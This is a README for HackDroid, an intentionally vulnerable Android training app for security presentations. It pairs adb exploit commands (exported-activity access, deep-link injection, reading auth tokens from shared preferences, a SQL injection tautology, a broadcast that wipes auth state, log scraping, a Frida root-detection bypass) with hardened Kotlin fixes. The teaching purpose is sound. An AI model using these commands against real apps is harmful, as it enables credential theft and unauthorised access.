An intentionally vulnerable Android app for security presentations.
Built to demonstrate real Android vulnerabilities live on stage. Every screen has a "How to Hack" and "How to Protect" section.
This app is intentionally insecure. Never install on a production device or use with real credentials. For educational/demo purposes ONLY.
| # | Vulnerability | Severity | Live Demo |
|---|---|---|---|
| 1 | Exported Components | CRITICAL | `adb shell am start -n com.hackdroid.demo/.vulns.AdminActivity` |
| 2 | Deep Links | HIGH | `adb shell am start -a android.intent.action.VIEW -d "hackdroid://transfer?amount=9999&to=attacker"` |
| 3 | WebViews / JS Bridge | HIGH | Load `webview_demo.html` in the WebView demo |
| 4 | Insecure Storage | MEDIUM | `adb shell run-as com.hackdroid.demo cat /data/data/com.hackdroid.demo/shared_prefs/auth_prefs.xml` |
| 5 | SQL Injection | MEDIUM | `adb shell content query --uri content://com.hackdroid.demo.provider/users --where "1=1"` |
| 6 | Reverse Engineering | LOW | `jadx -d out/ app.apk` |
| 7 | Broadcast Receivers | LOW | `adb shell am broadcast -a com.hackdroid.RESET_AUTH` |
- Android Studio Hedgehog or newer
- Android device or emulator (rooted recommended for full demo)
- ADB installed and on PATH
- Java 17+
```bash
git clone https://github.com/jacksonfdam/hackdroid
cd hackdroid
./gradlew assembleDebug
adb install app/build/outputs/apk/debug/app-debug.apk
```
- Settings → About Phone → tap "Build Number" 7 times
- Settings → Developer Options → Enable USB Debugging
- `adb devices` → confirm device listed
Demo 1: Exported Components
```bash
adb shell am start -n com.hackdroid.demo/.vulns.AdminActivity
```
Expected: Admin panel opens without any login screen.
Demo 2: Deep Links
```bash
adb shell am start -a android.intent.action.VIEW \
  -d "hackdroid://transfer?amount=9999&to=attacker"
```
Expected: Transfer screen shows attacker-controlled values with no validation.
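The defence for Demo 2, as an added example that is not HackDroid's own `DeepLinkActivity` (the class name `SafeDeepLinkActivity`, the limit `maxAmount` and the recipient set are constructed for the illustration): every value in the link is attacker-controlled, so it is checked for scheme, host, type, range and membership and the flow fails closed on the first problem.

```kotlin
// Added example, not HackDroid's own DeepLinkActivity: a hardened handler for
// hackdroid://transfer that validates every parameter before it is used.
import android.app.Activity
import android.net.Uri
import android.os.Bundle

data class TransferRequest(val amount: Long, val to: String)

class SafeDeepLinkActivity : Activity() {   // hypothetical name
    // Constructed policy values for the example; real limits would come from the server.
    private val maxAmount = 5_000L
    private val knownRecipients = setOf("savings", "checking")

    // Everything in the URI is attacker-controlled: check scheme/host, type, range
    // and membership, and return a failure on the first problem.
    fun parseTransfer(uri: Uri?): Result<TransferRequest> {
        if (uri == null || uri.scheme != "hackdroid" || uri.host != "transfer") {
            return Result.failure(IllegalArgumentException("unexpected link"))
        }
        val amount = uri.getQueryParameter("amount")?.toLongOrNull()
            ?: return Result.failure(IllegalArgumentException("amount missing or not numeric"))
        if (amount <= 0 || amount > maxAmount) {
            return Result.failure(IllegalArgumentException("amount out of range"))
        }
        val to = uri.getQueryParameter("to")
            ?: return Result.failure(IllegalArgumentException("recipient missing"))
        if (to !in knownRecipients) {
            return Result.failure(IllegalArgumentException("unknown recipient"))
        }
        return Result.success(TransferRequest(amount, to))
    }

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        parseTransfer(intent?.data)
            // Even a valid link only pre-fills the form; the user must confirm explicitly.
            .onSuccess { req -> showConfirmation(req) }
            .onFailure { finish() }     // never render attacker-chosen values
    }

    private fun showConfirmation(req: TransferRequest) {
        // Render req.amount / req.to and wait for an explicit "Confirm" tap (UI omitted).
    }
}
```

With these rules the demo link `hackdroid://transfer?amount=9999&to=attacker` is rejected twice over: `9999` exceeds `maxAmount` and `attacker` is not a known recipient.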
Demo 3: Insecure Storage
```bash
# No root required: works on any debug APK
adb shell run-as com.hackdroid.demo \
  cat /data/data/com.hackdroid.demo/shared_prefs/auth_prefs.xml

# Alternative: copy to sdcard, then pull
adb shell run-as com.hackdroid.demo \
  cp /data/data/com.hackdroid.demo/shared_prefs/auth_prefs.xml /sdcard/auth_prefs.xml
adb pull /sdcard/auth_prefs.xml && cat auth_prefs.xml
```
Expected: Auth token, email, and session ID visible in plain XML.
Why `run-as` instead of `adb pull`? A direct `adb pull` of `/data/data/` requires root. `run-as` works on any debug build without root, making this a real-world attack, not just a rooted-device demo.
Demo 4: SQL Injection
```bash
# Simplest: no shell-quoting issues
adb shell content query \
  --uri content://com.hackdroid.demo.provider/users \
  --where "1=1"

# Classic tautology payload (inner double-quotes must be escaped for the remote shell)
adb shell content query \
  --uri content://com.hackdroid.demo.provider/users \
  --where "\"name='x' OR '1'='1'\""
```
Expected: All user rows returned including plaintext tokens.
Shell quoting note: `adb shell` passes arguments to the device shell, so `--where` values containing spaces and single quotes need an extra layer of quoting. `1=1` is the easiest demo payload and is still a valid SQL injection tautology.
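The defence for Demo 4, as an added example that is not HackDroid's `VulnerableContentProvider` (the class name, the `users.db` path and the column names are constructed): the `--where` string is never concatenated into SQL. `SQLiteQueryBuilder` in strict mode validates it against a column whitelist that deliberately omits the token column, so a tautology can at most list the non-secret columns, and only for callers the manifest allows (`android:exported="false"` or a `readPermission` still has to be set there).

```kotlin
// Added example, not HackDroid's VulnerableContentProvider: a read-only provider
// whose query() never builds SQL from the caller's selection string.
import android.content.ContentProvider
import android.content.ContentValues
import android.database.Cursor
import android.database.sqlite.SQLiteDatabase
import android.database.sqlite.SQLiteQueryBuilder
import android.net.Uri

class HardenedUsersProvider : ContentProvider() {   // hypothetical name
    private lateinit var db: SQLiteDatabase

    // Only these columns can be named in projection, selection or sort order.
    // "token" is intentionally absent, so it can never be selected or filtered on.
    private val safeColumns = mapOf("_id" to "_id", "name" to "name", "email" to "email")

    override fun onCreate(): Boolean {
        // Constructed database file name for the example; opened read-only.
        val path = context!!.getDatabasePath("users.db").path
        db = SQLiteDatabase.openDatabase(path, null, SQLiteDatabase.OPEN_READONLY)
        return true
    }

    override fun query(uri: Uri, projection: Array<String>?, selection: String?,
                       selectionArgs: Array<String>?, sortOrder: String?): Cursor? {
        if (uri.pathSegments.firstOrNull() != "users") {
            throw IllegalArgumentException("unsupported uri $uri")
        }
        val qb = SQLiteQueryBuilder().apply {
            tables = "users"
            projectionMap = safeColumns
            setStrict(true)          // selection/sort may only reference safeColumns
            setStrictColumns(true)   // API 28+: same rule for the projection
            setStrictGrammar(true)   // API 28+: rejects ';', comments and subqueries
        }
        // Values belong in selectionArgs (bound parameters), never in the string.
        return qb.query(db, projection ?: arrayOf("_id", "name", "email"),
                        selection, selectionArgs, null, null, sortOrder)
    }

    // Read-only provider: every mutating entry point is refused.
    override fun insert(uri: Uri, values: ContentValues?): Uri? = null
    override fun update(uri: Uri, values: ContentValues?, selection: String?,
                        selectionArgs: Array<String>?): Int = 0
    override fun delete(uri: Uri, selection: String?, selectionArgs: Array<String>?): Int = 0
    override fun getType(uri: Uri): String = "vnd.android.cursor.dir/vnd.hackdroid.user"
}
```

Against this provider the second payload above (`name='x' OR '1'='1'`) is parsed as a filter over the whitelisted `name` column only; any attempt to name `token` throws `IllegalArgumentException` before SQLite sees the query.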
Demo 5: Broadcast Receivers
```bash
adb shell am broadcast -a com.hackdroid.RESET_AUTH
```
Expected: App shows Toast "Auth state cleared via broadcast!" and all SharedPreferences are wiped.
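The defence for Demo 5, as an added example that is not HackDroid's `AuthResetReceiver` (the class and function names are constructed): the receiver is registered at runtime with `RECEIVER_NOT_EXPORTED`, which is the code-level equivalent of `android:exported="false"` in the manifest and the same rule that fixes the exported `AdminActivity` from Demo 1. It assumes `androidx.core` 1.9.0 or newer for `ContextCompat.registerReceiver`.

```kotlin
// Added example, not HackDroid's AuthResetReceiver: a non-exported receiver that
// only this app's own broadcasts can reach, and that acts only on the exact action.
import android.content.BroadcastReceiver
import android.content.Context
import android.content.Intent
import android.content.IntentFilter
import androidx.core.content.ContextCompat

const val ACTION_RESET_AUTH = "com.hackdroid.RESET_AUTH"

class GuardedAuthResetReceiver(private val clearAuth: () -> Unit) : BroadcastReceiver() {
    override fun onReceive(context: Context, intent: Intent) {
        // Defensive even though the receiver is not exported: ignore anything
        // that is not exactly the reset action (no wildcard or extra-driven behaviour).
        if (intent.action != ACTION_RESET_AUTH) return
        clearAuth()
    }
}

// Call from the Activity/Application that owns the auth state; keep the returned
// receiver and unregister it in onDestroy.
fun registerGuardedReceiver(context: Context, clearAuth: () -> Unit): BroadcastReceiver {
    val receiver = GuardedAuthResetReceiver(clearAuth)
    ContextCompat.registerReceiver(
        context, receiver, IntentFilter(ACTION_RESET_AUTH),
        ContextCompat.RECEIVER_NOT_EXPORTED   // other apps can no longer trigger it
    )
    return receiver
}
```

If the receiver must stay declared in the manifest instead, `android:exported="false"` on the `<receiver>` element gives the same result; an exported receiver that needs outside callers should at least require a signature-level permission.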
Demo 6: Leaky Service
```bash
adb shell am startservice -n com.hackdroid.demo/.vulns.LeakyService
adb logcat | grep HackDroid_LEAK
```
Expected: Session token, email, and API key printed to Logcat.
Demo 7: WebViews / JS Bridge
Open Vulns → WebViews / JS Bridge → Run Demo Exploit → use the buttons in the WebView page.
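The defence for Demo 7, as an added example that is not HackDroid's `WebViewDemoActivity` (the class name and the bridge name `HackDroidBridge` are constructed; it assumes the `androidx.webkit` library for `WebViewAssetLoader`): the bundled `webview_demo.html` is served from a fixed `https://appassets.androidplatform.net` origin, the JS bridge exposes no privileged method, file and content access are off, and navigation to any other origin is refused, so remote JavaScript never gets a chance to call the bridge.

```kotlin
// Added example, not HackDroid's WebViewDemoActivity: a WebView that serves only
// the bundled page, exposes a harmless bridge, and refuses to navigate elsewhere.
import android.annotation.SuppressLint
import android.app.Activity
import android.os.Bundle
import android.webkit.JavascriptInterface
import android.webkit.WebResourceRequest
import android.webkit.WebResourceResponse
import android.webkit.WebSettings
import android.webkit.WebView
import android.webkit.WebViewClient
import androidx.webkit.WebViewAssetLoader

class HardenedWebViewActivity : Activity() {   // hypothetical name
    // Only @JavascriptInterface methods are callable from JS (minSdk >= 17).
    // Nothing here returns tokens, reads files or launches components.
    class Bridge(private val onMessage: (String) -> Unit) {
        @JavascriptInterface
        fun postMessage(msg: String) { if (msg.length <= 256) onMessage(msg) }
    }

    private val origin = "https://appassets.androidplatform.net"
    private val demoPage = "$origin/assets/webview_demo.html"

    @SuppressLint("SetJavaScriptEnabled")
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        val assets = WebViewAssetLoader.Builder()
            .addPathHandler("/assets/", WebViewAssetLoader.AssetsPathHandler(this))
            .build()
        val webView = WebView(this).apply {
            settings.javaScriptEnabled = true                 // required by the demo page
            settings.allowFileAccess = false                  // no file:// reads
            settings.allowContentAccess = false               // no content:// reads
            settings.mixedContentMode = WebSettings.MIXED_CONTENT_NEVER_ALLOW
            addJavascriptInterface(Bridge { msg -> onBridgeMessage(msg) }, "HackDroidBridge")
            webViewClient = object : WebViewClient() {
                override fun shouldInterceptRequest(view: WebView, request: WebResourceRequest): WebResourceResponse? =
                    assets.shouldInterceptRequest(request.url)   // serves /assets/ from the APK
                // true = block: any navigation outside our asset origin is never loaded.
                override fun shouldOverrideUrlLoading(view: WebView, request: WebResourceRequest): Boolean =
                    !request.url.toString().startsWith("$origin/assets/")
            }
        }
        setContentView(webView)
        webView.loadUrl(demoPage)
    }

    private fun onBridgeMessage(msg: String) { /* treat as untrusted input, e.g. show a Toast */ }
}
```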
Demo 8: Frida Hook (Root Detection Bypass)
```bash
frida -U -f com.hackdroid.demo --no-pause \
  -l app/src/main/assets/frida_scripts/bypass_root_detection.js
```
Expected: `[HackDroid] Root detection bypassed → all checks return false`
| Tool | Purpose | Install |
|---|---|---|
| ADB | Device communication | Android Platform Tools |
| Frida | Runtime hooks | `pip install frida-tools` |
| JADX | APK decompiler | `brew install jadx` |
| Burp Suite | Traffic intercept | portswigger.net |
| MobSF | Auto scanner | `docker run -it opensecurity/mobile-security-framework-mobsf` |
```text
app/src/main/
├── java/com/hackdroid/demo/
│   ├── MainActivity.kt
│   ├── data/
│   │   └── VulnerabilityData.kt
│   ├── navigation/
│   │   └── AppNavigation.kt
│   ├── security/
│   │   └── RootChecker.kt                 ← Hooked by Frida demo
│   ├── ui/
│   │   ├── theme/
│   │   │   ├── Color.kt
│   │   │   ├── Type.kt
│   │   │   └── Theme.kt
│   │   └── screens/
│   │       ├── HomeScreen.kt
│   │       ├── VulnListScreen.kt
│   │       ├── VulnDetailScreen.kt
│   │       ├── ExploitLabScreen.kt
│   │       ├── DefenseGuideScreen.kt
│   │       ├── ToolkitScreen.kt
│   │       └── DemoScreens.kt
│   ├── viewmodel/
│   │   └── HackDroidViewModel.kt
│   └── vulns/
│       ├── AdminActivity.kt               ← CRITICAL: exported, no auth
│       ├── DeepLinkActivity.kt            ← HIGH: unvalidated params
│       ├── LeakyService.kt                ← HIGH: logs secrets to Logcat
│       ├── AuthResetReceiver.kt           ← LOW: exported broadcast
│       ├── VulnerableContentProvider.kt   ← MEDIUM: SQL injection
│       ├── InsecureStorageActivity.kt     ← MEDIUM: plain SharedPrefs
│       └── WebViewDemoActivity.kt         ← HIGH: JS bridge exploit
├── assets/
│   ├── webview_demo.html
│   └── frida_scripts/
│       ├── bypass_root_detection.js
│       ├── bypass_ssl_pinning.js
│       └── dump_strings.js
└── AndroidManifest.xml
```
Each screen in the app maps directly to a slide in your presentation:
| Screen | Vuln | Live Demo Command |
|---|---|---|
| Exploit Lab → Bypass Exported Activity | Exported Components | Demo 1 |
| Exploit Lab → Deep Link Injection | Deep Links | Demo 2 |
| Exploit Lab → Read SharedPreferences | Insecure Storage | Demo 3 |
| Vuln Detail → SQL Injection | SQL Injection | Demo 4 |
| Broadcast Receivers (ADB) | Broadcast Receivers | Demo 5 |
| WebView Demo | WebViews | Demo 7 |
| Exploit Lab → Frida Hook | Reverse Engineering | Demo 8 |
MIT, for educational use only. The authors are not responsible for misuse.